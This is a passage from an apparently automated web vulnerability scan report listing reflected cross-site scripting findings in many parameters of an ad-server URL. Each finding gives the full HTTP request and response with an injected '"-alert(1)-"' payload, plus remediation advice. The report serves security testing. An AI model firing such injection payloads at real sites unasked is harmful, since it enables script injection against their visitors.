og.com.com/adlog/e/r=8024&sg=476619&o=10784%253a27080%253aB245%253a9733575%253a&h=cn&p=2&b=5&l=en_US&site=3&pt=8301&nd=27080&pid=&cid=20012253&pp=100&e=3&rqid=01phx1-ad-e19:4CE9570D62F33C&orh=wired.com8bca5"-alert(1)-"629032b61be&oepartner=&epartner=&ppartner=&pdom=www.wired.com&cpnmodule=&count=&ra=174.121.222.18&pg=w0nPqQoOYI8AAHuqdI4AAAFI&t=2010.11.21.21.24.20&event=58/http://www.google.com/chrome/?brand=CHIH&utm_campaign=e
...[SNIP]...

1.15. http://ad.vulnerable.ad.partner/adi/N5295.150723.CBSI/B4885922 [p parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://ad.vulnerable.ad.partner
Path:   /adi/N5295.150723.CBSI/B4885922

Issue detail

The value of the p request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload a1c83"-alert(1)-"afe2288af06 was submitted in the p parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /adi/N5295.150723.CBSI/B4885922;sz=300x250;click0=http://adlog.com.com/adlog/e/r=8024&sg=476619&o=10784%253a27080%253aB245%253a9733575%253a&h=cn&p=2a1c83"-alert(1)-"afe2288af06&b=5&l=en_US&site=3&pt=8301&nd=27080&pid=&cid=20012253&pp=100&e=3&rqid=01phx1-ad-e19:4CE9570D62F33C&orh=wired.com&oepartner=&epartner=&ppartner=&pdom=www.wired.com&cpnmodule=&count=&ra=174.121.222.18&pg=w0nPqQoOYI8AAHuqdI4AAAFI&t=2010.11.21.21.24.20&event=58/;ord=2010.11.21.21.24.20? HTTP/1.1
Accept: image/jpeg, image/gif, image/pjpeg, application/x-ms-application, application/xaml+xml, application/x-ms-xbap, */*
Referer: http://news.cnet.com/8301-27080_3-20012253-245.html
Accept-Language: en-US
User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1; WOW64; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; .NET4.0C; .NET4.0E)
Accept-Encoding: gzip, deflate
Host: ad.vulnerable.ad.partner
Proxy-Connection: Keep-Alive
Cookie: id=c0163e92e0000c2||t=1290273585|et=730|cs=hcd3kvix

Response

HTTP/1.1 200 OK
Server: DCLK-AdSvr
Content-Type: text/html
Date: Mon, 22 Nov 2010 00:05:31 GMT
Cache-Control: private, x-gzip-ok=""
Content-Length: 6913

<!-- Copyright 2008 DoubleClick, a division of Google Inc. All rights reserved. -->
<!-- Code auto-generated on Thu Aug 19 07:11:31 EDT 2010 -->
<script src="http://s0.2mdn.net/879366/flashwrite_1_2
...[SNIP]...
a/17/181/%2a/z%3B231241976%3B1-0%3B0%3B55844876%3B4307-300/250%3B38009999/38027756/1%3B%3B%7Esscs%3D%3fhttp://adlog.com.com/adlog/e/r=8024&sg=476619&o=10784%253a27080%253aB245%253a9733575%253a&h=cn&p=2a1c83"-alert(1)-"afe2288af06&b=5&l=en_US&site=3&pt=8301&nd=27080&pid=&cid=20012253&pp=100&e=3&rqid=01phx1-ad-e19:4CE9570D62F33C&orh=wired.com&oepartner=&epartner=&ppartner=&pdom=www.wired.com&cpnmodule=&count=&ra=174.121.222.18&p
...[SNIP]...

1.16. http://ad.vulnerable.ad.partner/adi/N5295.150723.CBSI/B4885922 [pdom parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://ad.vulnerable.ad.partner
Path:   /adi/N5295.150723.CBSI/B4885922

Issue detail

The value of the pdom request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 2abbd"-alert(1)-"5fda04e4c5c was submitted in the pdom parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /adi/N5295.150723.CBSI/B4885922;sz=300x250;click0=http://adlog.com.com/adlog/e/r=8024&sg=476619&o=10784%253a27080%253aB245%253a9733575%253a&h=cn&p=2&b=5&l=en_US&site=3&pt=8301&nd=27080&pid=&cid=20012253&pp=100&e=3&rqid=01phx1-ad-e19:4CE9570D62F33C&orh=wired.com&oepartner=&epartner=&ppartner=&pdom=www.wired.com2abbd"-alert(1)-"5fda04e4c5c&cpnmodule=&count=&ra=174.121.222.18&pg=w0nPqQoOYI8AAHuqdI4AAAFI&t=2010.11.21.21.24.20&event=58/;ord=2010.11.21.21.24.20? HTTP/1.1
Accept: image/jpeg, image/gif, image/pjpeg, application/x-ms-application, application/xaml+xml, application/x-ms-xbap, */*
Referer: http://news.cnet.com/8301-27080_3-20012253-245.html
Accept-Language: en-US
User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1; WOW64; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; .NET4.0C; .NET4.0E)
Accept-Encoding: gzip, deflate
Host: ad.vulnerable.ad.partner
Proxy-Connection: Keep-Alive
Cookie: id=c0163e92e0000c2||t=1290273585|et=730|cs=hcd3kvix

Response

HTTP/1.1 200 OK
Server: DCLK-AdSvr
Content-Type: text/html
Date: Mon, 22 Nov 2010 00:11:54 GMT
Cache-Control: private, x-gzip-ok=""
Content-Length: 6913

<!-- Copyright 2008 DoubleClick, a division of Google Inc. All rights reserved. -->
<!-- Code auto-generated on Thu Aug 19 07:11:31 EDT 2010 -->
<script src="http://s0.2mdn.net/879366/flashwrite_1_2
...[SNIP]...
080%253aB245%253a9733575%253a&h=cn&p=2&b=5&l=en_US&site=3&pt=8301&nd=27080&pid=&cid=20012253&pp=100&e=3&rqid=01phx1-ad-e19:4CE9570D62F33C&orh=wired.com&oepartner=&epartner=&ppartner=&pdom=www.wired.com2abbd"-alert(1)-"5fda04e4c5c&cpnmodule=&count=&ra=174.121.222.18&pg=w0nPqQoOYI8AAHuqdI4AAAFI&t=2010.11.21.21.24.20&event=58/http://www.google.com/chrome/?brand=CHIH&utm_campaign=en&utm_source=en-oa-na-us-N5295.150723.CBSI&utm_med
...[SNIP]...

1.17. http://ad.vulnerable.ad.partner/adi/N5295.150723.CBSI/B4885922 [pg parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://ad.vulnerable.ad.partner
Path:   /adi/N5295.150723.CBSI/B4885922

Issue detail

The value of the pg request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 8bcfe"-alert(1)-"9006f31a0a5 was submitted in the pg parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /adi/N5295.150723.CBSI/B4885922;sz=300x250;click0=http://adlog.com.com/adlog/e/r=8024&sg=476619&o=10784%253a27080%253aB245%253a9733575%253a&h=cn&p=2&b=5&l=en_US&site=3&pt=8301&nd=27080&pid=&cid=20012253&pp=100&e=3&rqid=01phx1-ad-e19:4CE9570D62F33C&orh=wired.com&oepartner=&epartner=&ppartner=&pdom=www.wired.com&cpnmodule=&count=&ra=174.121.222.18&pg=w0nPqQoOYI8AAHuqdI4AAAFI8bcfe"-alert(1)-"9006f31a0a5&t=2010.11.21.21.24.20&event=58/;ord=2010.11.21.21.24.20? HTTP/1.1
Accept: image/jpeg, image/gif, image/pjpeg, application/x-ms-application, application/xaml+xml, application/x-ms-xbap, */*
Referer: http://news.cnet.com/8301-27080_3-20012253-245.html
Accept-Language: en-US
User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1; WOW64; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; .NET4.0C; .NET4.0E)
Accept-Encoding: gzip, deflate
Host: ad.vulnerable.ad.partner
Proxy-Connection: Keep-Alive
Cookie: id=c0163e92e0000c2||t=1290273585|et=730|cs=hcd3kvix

Response

HTTP/1.1 200 OK
Server: DCLK-AdSvr
Content-Type: text/html
Date: Mon, 22 Nov 2010 00:13:07 GMT
Cache-Control: private, x-gzip-ok=""
Content-Length: 6913

<!-- Copyright 2008 DoubleClick, a division of Google Inc. All rights reserved. -->
<!-- Code auto-generated on Thu Aug 19 07:12:10 EDT 2010 -->
<script src="http://s0.2mdn.net/879366/flashwrite_1_2
...[SNIP]...
1&nd=27080&pid=&cid=20012253&pp=100&e=3&rqid=01phx1-ad-e19:4CE9570D62F33C&orh=wired.com&oepartner=&epartner=&ppartner=&pdom=www.wired.com&cpnmodule=&count=&ra=174.121.222.18&pg=w0nPqQoOYI8AAHuqdI4AAAFI8bcfe"-alert(1)-"9006f31a0a5&t=2010.11.21.21.24.20&event=58/http://www.google.com/chrome/?brand=CHIH&utm_campaign=en&utm_source=en-oa-na-us-N5295.150723.CBSI&utm_medium=oa");
var fscUrl = url;
var fscUrlClickTagFound = false;

...[SNIP]...

1.18. http://ad.vulnerable.ad.partner/adi/N5295.150723.CBSI/B4885922 [pid parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://ad.vulnerable.ad.partner
Path:   /adi/N5295.150723.CBSI/B4885922

Issue detail

The value of the pid request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 25277"-alert(1)-"1ddf9b03232 was submitted in the pid parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /adi/N5295.150723.CBSI/B4885922;sz=300x250;click0=http://adlog.com.com/adlog/e/r=8024&sg=476619&o=10784%253a27080%253aB245%253a9733575%253a&h=cn&p=2&b=5&l=en_US&site=3&pt=8301&nd=27080&pid=25277"-alert(1)-"1ddf9b03232&cid=20012253&pp=100&e=3&rqid=01phx1-ad-e19:4CE9570D62F33C&orh=wired.com&oepartner=&epartner=&ppartner=&pdom=www.wired.com&cpnmodule=&count=&ra=174.121.222.18&pg=w0nPqQoOYI8AAHuqdI4AAAFI&t=2010.11.21.21.24.20&event=58/;ord=2010.11.21.21.24.20? HTTP/1.1
Accept: image/jpeg, image/gif, image/pjpeg, application/x-ms-application, application/xaml+xml, application/x-ms-xbap, */*
Referer: http://news.cnet.com/8301-27080_3-20012253-245.html
Accept-Language: en-US
User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1; WOW64; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; .NET4.0C; .NET4.0E)
Accept-Encoding: gzip, deflate
Host: ad.vulnerable.ad.partner
Proxy-Connection: Keep-Alive
Cookie: id=c0163e92e0000c2||t=1290273585|et=730|cs=hcd3kvix

Response

HTTP/1.1 200 OK
Server: DCLK-AdSvr
Content-Type: text/html
Date: Mon, 22 Nov 2010 00:09:17 GMT
Cache-Control: private, x-gzip-ok=""
Content-Length: 6913

<!-- Copyright 2008 DoubleClick, a division of Google Inc. All rights reserved. -->
<!-- Code auto-generated on Thu Aug 19 07:11:31 EDT 2010 -->
<script src="http://s0.2mdn.net/879366/flashwrite_1_2
...[SNIP]...
844876%3B4307-300/250%3B38009999/38027756/1%3B%3B%7Esscs%3D%3fhttp://adlog.com.com/adlog/e/r=8024&sg=476619&o=10784%253a27080%253aB245%253a9733575%253a&h=cn&p=2&b=5&l=en_US&site=3&pt=8301&nd=27080&pid=25277"-alert(1)-"1ddf9b03232&cid=20012253&pp=100&e=3&rqid=01phx1-ad-e19:4CE9570D62F33C&orh=wired.com&oepartner=&epartner=&ppartner=&pdom=www.wired.com&cpnmodule=&count=&ra=174.121.222.18&pg=w0nPqQoOYI8AAHuqdI4AAAFI&t=2010.11.21.2
...[SNIP]...

1.19. http://ad.vulnerable.ad.partner/adi/N5295.150723.CBSI/B4885922 [pp parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://ad.vulnerable.ad.partner
Path:   /adi/N5295.150723.CBSI/B4885922

Issue detail

The value of the pp request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 7d0be"-alert(1)-"7df4c502bea was submitted in the pp parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /adi/N5295.150723.CBSI/B4885922;sz=300x250;click0=http://adlog.com.com/adlog/e/r=8024&sg=476619&o=10784%253a27080%253aB245%253a9733575%253a&h=cn&p=2&b=5&l=en_US&site=3&pt=8301&nd=27080&pid=&cid=20012253&pp=1007d0be"-alert(1)-"7df4c502bea&e=3&rqid=01phx1-ad-e19:4CE9570D62F33C&orh=wired.com&oepartner=&epartner=&ppartner=&pdom=www.wired.com&cpnmodule=&count=&ra=174.121.222.18&pg=w0nPqQoOYI8AAHuqdI4AAAFI&t=2010.11.21.21.24.20&event=58/;ord=2010.11.21.21.24.20? HTTP/1.1
Accept: image/jpeg, image/gif, image/pjpeg, application/x-ms-application, application/xaml+xml, application/x-ms-xbap, */*
Referer: http://news.cnet.com/8301-27080_3-20012253-245.html
Accept-Language: en-US
User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1; WOW64; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; .NET4.0C; .NET4.0E)
Accept-Encoding: gzip, deflate
Host: ad.vulnerable.ad.partner
Proxy-Connection: Keep-Alive
Cookie: id=c0163e92e0000c2||t=1290273585|et=730|cs=hcd3kvix

Response

HTTP/1.1 200 OK
Server: DCLK-AdSvr
Content-Type: text/html
Date: Mon, 22 Nov 2010 00:09:54 GMT
Cache-Control: private, x-gzip-ok=""
Content-Length: 6913

<!-- Copyright 2008 DoubleClick, a division of Google Inc. All rights reserved. -->
<!-- Code auto-generated on Thu Aug 19 07:12:10 EDT 2010 -->
<script src="http://s0.2mdn.net/879366/flashwrite_1_2
...[SNIP]...
0%3B38010001/38027758/1%3B%3B%7Esscs%3D%3fhttp://adlog.com.com/adlog/e/r=8024&sg=476619&o=10784%253a27080%253aB245%253a9733575%253a&h=cn&p=2&b=5&l=en_US&site=3&pt=8301&nd=27080&pid=&cid=20012253&pp=1007d0be"-alert(1)-"7df4c502bea&e=3&rqid=01phx1-ad-e19:4CE9570D62F33C&orh=wired.com&oepartner=&epartner=&ppartner=&pdom=www.wired.com&cpnmodule=&count=&ra=174.121.222.18&pg=w0nPqQoOYI8AAHuqdI4AAAFI&t=2010.11.21.21.24.20&event=58/htt
...[SNIP]...

1.20. http://ad.vulnerable.ad.partner/adi/N5295.150723.CBSI/B4885922 [ppartner parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://ad.vulnerable.ad.partner
Path:   /adi/N5295.150723.CBSI/B4885922

Issue detail

The value of the ppartner request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 288db"-alert(1)-"a81bde65779 was submitted in the ppartner parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /adi/N5295.150723.CBSI/B4885922;sz=300x250;click0=http://adlog.com.com/adlog/e/r=8024&sg=476619&o=10784%253a27080%253aB245%253a9733575%253a&h=cn&p=2&b=5&l=en_US&site=3&pt=8301&nd=27080&pid=&cid=20012253&pp=100&e=3&rqid=01phx1-ad-e19:4CE9570D62F33C&orh=wired.com&oepartner=&epartner=&ppartner=288db"-alert(1)-"a81bde65779&pdom=www.wired.com&cpnmodule=&count=&ra=174.121.222.18&pg=w0nPqQoOYI8AAHuqdI4AAAFI&t=2010.11.21.21.24.20&event=58/;ord=2010.11.21.21.24.20? HTTP/1.1
Accept: image/jpeg, image/gif, image/pjpeg, application/x-ms-application, application/xaml+xml, application/x-ms-xbap, */*
Referer: http://news.cnet.com/8301-27080_3-20012253-245.html
Accept-Language: en-US
User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1; WOW64; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; .NET4.0C; .NET4.0E)
Accept-Encoding: gzip, deflate
Host: ad.vulnerable.ad.partner
Proxy-Connection: Keep-Alive
Cookie: id=c0163e92e0000c2||t=1290273585|et=730|cs=hcd3kvix

Response

HTTP/1.1 200 OK
Server: DCLK-AdSvr
Content-Type: text/html
Date: Mon, 22 Nov 2010 00:11:38 GMT
Cache-Control: private, x-gzip-ok=""
Content-Length: 6913

<!-- Copyright 2008 DoubleClick, a division of Google Inc. All rights reserved. -->
<!-- Code auto-generated on Thu Aug 19 07:12:10 EDT 2010 -->
<script src="http://s0.2mdn.net/879366/flashwrite_1_2
...[SNIP]...
6619&o=10784%253a27080%253aB245%253a9733575%253a&h=cn&p=2&b=5&l=en_US&site=3&pt=8301&nd=27080&pid=&cid=20012253&pp=100&e=3&rqid=01phx1-ad-e19:4CE9570D62F33C&orh=wired.com&oepartner=&epartner=&ppartner=288db"-alert(1)-"a81bde65779&pdom=www.wired.com&cpnmodule=&count=&ra=174.121.222.18&pg=w0nPqQoOYI8AAHuqdI4AAAFI&t=2010.11.21.21.24.20&event=58/http://www.google.com/chrome/?brand=CHIH&utm_campaign=en&utm_source=en-oa-na-us-N5295.
...[SNIP]...

1.21. http://ad.vulnerable.ad.partner/adi/N5295.150723.CBSI/B4885922 [pt parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://ad.vulnerable.ad.partner
Path:   /adi/N5295.150723.CBSI/B4885922

Issue detail

The value of the pt request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 2c336"-alert(1)-"521d37aa33 was submitted in the pt parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /adi/N5295.150723.CBSI/B4885922;sz=300x250;click0=http://adlog.com.com/adlog/e/r=8024&sg=476619&o=10784%253a27080%253aB245%253a9733575%253a&h=cn&p=2&b=5&l=en_US&site=3&pt=83012c336"-alert(1)-"521d37aa33&nd=27080&pid=&cid=20012253&pp=100&e=3&rqid=01phx1-ad-e19:4CE9570D62F33C&orh=wired.com&oepartner=&epartner=&ppartner=&pdom=www.wired.com&cpnmodule=&count=&ra=174.121.222.18&pg=w0nPqQoOYI8AAHuqdI4AAAFI&t=2010.11.21.21.24.20&event=58/;ord=2010.11.21.21.24.20? HTTP/1.1
Accept: image/jpeg, image/gif, image/pjpeg, application/x-ms-application, application/xaml+xml, application/x-ms-xbap, */*
Referer: http://news.cnet.com/8301-27080_3-20012253-245.html
Accept-Language: en-US
User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1; WOW64; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; .NET4.0C; .NET4.0E)
Accept-Encoding: gzip, deflate
Host: ad.vulnerable.ad.partner
Proxy-Connection: Keep-Alive
Cookie: id=c0163e92e0000c2||t=1290273585|et=730|cs=hcd3kvix

Response

HTTP/1.1 200 OK
Server: DCLK-AdSvr
Content-Type: text/html
Date: Mon, 22 Nov 2010 00:07:27 GMT
Cache-Control: private, x-gzip-ok=""
Content-Length: 6909

<!-- Copyright 2008 DoubleClick, a division of Google Inc. All rights reserved. -->
<!-- Code auto-generated on Thu Aug 19 07:12:10 EDT 2010 -->
<script src="http://s0.2mdn.net/879366/flashwrite_1_2
...[SNIP]...
3B2-0%3B0%3B55844876%3B4307-300/250%3B38010001/38027758/1%3B%3B%7Esscs%3D%3fhttp://adlog.com.com/adlog/e/r=8024&sg=476619&o=10784%253a27080%253aB245%253a9733575%253a&h=cn&p=2&b=5&l=en_US&site=3&pt=83012c336"-alert(1)-"521d37aa33&nd=27080&pid=&cid=20012253&pp=100&e=3&rqid=01phx1-ad-e19:4CE9570D62F33C&orh=wired.com&oepartner=&epartner=&ppartner=&pdom=www.wired.com&cpnmodule=&count=&ra=174.121.222.18&pg=w0nPqQoOYI8AAHuqdI4AAAFI&
...[SNIP]...

1.22. http://ad.vulnerable.ad.partner/adi/N5295.150723.CBSI/B4885922 [ra parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://ad.vulnerable.ad.partner
Path:   /adi/N5295.150723.CBSI/B4885922

Issue detail

The value of the ra request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload ca204"-alert(1)-"a9f792ba15b was submitted in the ra parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /adi/N5295.150723.CBSI/B4885922;sz=300x250;click0=http://adlog.com.com/adlog/e/r=8024&sg=476619&o=10784%253a27080%253aB245%253a9733575%253a&h=cn&p=2&b=5&l=en_US&site=3&pt=8301&nd=27080&pid=&cid=20012253&pp=100&e=3&rqid=01phx1-ad-e19:4CE9570D62F33C&orh=wired.com&oepartner=&epartner=&ppartner=&pdom=www.wired.com&cpnmodule=&count=&ra=174.121.222.18ca204"-alert(1)-"a9f792ba15b&pg=w0nPqQoOYI8AAHuqdI4AAAFI&t=2010.11.21.21.24.20&event=58/;ord=2010.11.21.21.24.20? HTTP/1.1
Accept: image/jpeg, image/gif, image/pjpeg, application/x-ms-application, application/xaml+xml, application/x-ms-xbap, */*
Referer: http://news.cnet.com/8301-27080_3-20012253-245.html
Accept-Language: en-US
User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1; WOW64; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; .NET4.0C; .NET4.0E)
Accept-Encoding: gzip, deflate
Host: ad.vulnerable.ad.partner
Proxy-Connection: Keep-Alive
Cookie: id=c0163e92e0000c2||t=1290273585|et=730|cs=hcd3kvix

Response

HTTP/1.1 200 OK
Server: DCLK-AdSvr
Content-Type: text/html
Date: Mon, 22 Nov 2010 00:12:47 GMT
Cache-Control: private, x-gzip-ok=""
Content-Length: 6913

<!-- Copyright 2008 DoubleClick, a division of Google Inc. All rights reserved. -->
<!-- Code auto-generated on Thu Aug 19 07:12:10 EDT 2010 -->
<script src="http://s0.2mdn.net/879366/flashwrite_1_2
...[SNIP]...
=2&b=5&l=en_US&site=3&pt=8301&nd=27080&pid=&cid=20012253&pp=100&e=3&rqid=01phx1-ad-e19:4CE9570D62F33C&orh=wired.com&oepartner=&epartner=&ppartner=&pdom=www.wired.com&cpnmodule=&count=&ra=174.121.222.18ca204"-alert(1)-"a9f792ba15b&pg=w0nPqQoOYI8AAHuqdI4AAAFI&t=2010.11.21.21.24.20&event=58/http://www.google.com/chrome/?brand=CHIH&utm_campaign=en&utm_source=en-oa-na-us-N5295.150723.CBSI&utm_medium=oa");
var fscUrl = url;
var fs
...[SNIP]...

1.23. http://ad.vulnerable.ad.partner/adi/N5295.150723.CBSI/B4885922 [rqid parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://ad.vulnerable.ad.partner
Path:   /adi/N5295.150723.CBSI/B4885922

Issue detail

The value of the rqid request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload b1a69"-alert(1)-"0a05ff2bab1 was submitted in the rqid parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /adi/N5295.150723.CBSI/B4885922;sz=300x250;click0=http://adlog.com.com/adlog/e/r=8024&sg=476619&o=10784%253a27080%253aB245%253a9733575%253a&h=cn&p=2&b=5&l=en_US&site=3&pt=8301&nd=27080&pid=&cid=20012253&pp=100&e=3&rqid=01phx1-ad-e19:4CE9570D62F33Cb1a69"-alert(1)-"0a05ff2bab1&orh=wired.com&oepartner=&epartner=&ppartner=&pdom=www.wired.com&cpnmodule=&count=&ra=174.121.222.18&pg=w0nPqQoOYI8AAHuqdI4AAAFI&t=2010.11.21.21.24.20&event=58/;ord=2010.11.21.21.24.20? HTTP/1.1
Accept: image/jpeg, image/gif, image/pjpeg, application/x-ms-application, application/xaml+xml, application/x-ms-xbap, */*
Referer: http://news.cnet.com/8301-27080_3-20012253-245.html
Accept-Language: en-US
User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1; WOW64; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; .NET4.0C; .NET4.0E)
Accept-Encoding: gzip, deflate
Host: ad.vulnerable.ad.partner
Proxy-Connection: Keep-Alive
Cookie: id=c0163e92e0000c2||t=1290273585|et=730|cs=hcd3kvix

Response

HTTP/1.1 200 OK
Server: DCLK-AdSvr
Content-Type: text/html
Date: Mon, 22 Nov 2010 00:10:28 GMT
Cache-Control: private, x-gzip-ok=""
Content-Length: 6913

<!-- Copyright 2008 DoubleClick, a division of Google Inc. All rights reserved. -->
<!-- Code auto-generated on Thu Aug 19 07:12:10 EDT 2010 -->
<script src="http://s0.2mdn.net/879366/flashwrite_1_2
...[SNIP]...
D%3fhttp://adlog.com.com/adlog/e/r=8024&sg=476619&o=10784%253a27080%253aB245%253a9733575%253a&h=cn&p=2&b=5&l=en_US&site=3&pt=8301&nd=27080&pid=&cid=20012253&pp=100&e=3&rqid=01phx1-ad-e19:4CE9570D62F33Cb1a69"-alert(1)-"0a05ff2bab1&orh=wired.com&oepartner=&epartner=&ppartner=&pdom=www.wired.com&cpnmodule=&count=&ra=174.121.222.18&pg=w0nPqQoOYI8AAHuqdI4AAAFI&t=2010.11.21.21.24.20&event=58/http://www.google.com/chrome/?brand=CHIH&
...[SNIP]...

1.24. http://ad.vulnerable.ad.partner/adi/N5295.150723.CBSI/B4885922 [sg parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://ad.vulnerable.ad.partner
Path:   /adi/N5295.150723.CBSI/B4885922

Issue detail

The value of the sg request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload f1a4d"-alert(1)-"84edf4b2caa was submitted in the sg parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /adi/N5295.150723.CBSI/B4885922;sz=300x250;click0=http://adlog.com.com/adlog/e/r=8024&sg=476619f1a4d"-alert(1)-"84edf4b2caa&o=10784%253a27080%253aB245%253a9733575%253a&h=cn&p=2&b=5&l=en_US&site=3&pt=8301&nd=27080&pid=&cid=20012253&pp=100&e=3&rqid=01phx1-ad-e19:4CE9570D62F33C&orh=wired.com&oepartner=&epartner=&ppartner=&pdom=www.wired.com&cpnmodule=&count=&ra=174.121.222.18&pg=w0nPqQoOYI8AAHuqdI4AAAFI&t=2010.11.21.21.24.20&event=58/;ord=2010.11.21.21.24.20? HTTP/1.1
Accept: image/jpeg, image/gif, image/pjpeg, application/x-ms-application, application/xaml+xml, application/x-ms-xbap, */*
Referer: http://news.cnet.com/8301-27080_3-20012253-245.html
Accept-Language: en-US
User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1; WOW64; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; .NET4.0C; .NET4.0E)
Accept-Encoding: gzip, deflate
Host: ad.vulnerable.ad.partner
Proxy-Connection: Keep-Alive
Cookie: id=c0163e92e0000c2||t=1290273585|et=730|cs=hcd3kvix

Response

HTTP/1.1 200 OK
Server: DCLK-AdSvr
Content-Type: text/html
Date: Mon, 22 Nov 2010 00:04:34 GMT
Cache-Control: private, x-gzip-ok=""
Content-Length: 6914

<!-- Copyright 2008 DoubleClick, a division of Google Inc. All rights reserved. -->
<!-- Code auto-generated on Thu Aug 19 07:11:30 EDT 2010 -->
<script src="http://s0.2mdn.net/879366/flashwrite_1_2
...[SNIP]...
escape("http://ad.vulnerable.ad.partner/click%3Bh%3Dv8/3a5a/17/181/%2a/x%3B231241976%3B0-0%3B0%3B55844876%3B4307-300/250%3B38009996/38027753/1%3B%3B%7Esscs%3D%3fhttp://adlog.com.com/adlog/e/r=8024&sg=476619f1a4d"-alert(1)-"84edf4b2caa&o=10784%253a27080%253aB245%253a9733575%253a&h=cn&p=2&b=5&l=en_US&site=3&pt=8301&nd=27080&pid=&cid=20012253&pp=100&e=3&rqid=01phx1-ad-e19:4CE9570D62F33C&orh=wired.com&oepartner=&epartner=&ppartner=&pdo
...[SNIP]...

1.25. http://ad.vulnerable.ad.partner/adi/N5295.150723.CBSI/B4885922 [site parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://ad.vulnerable.ad.partner
Path:   /adi/N5295.150723.CBSI/B4885922

Issue detail

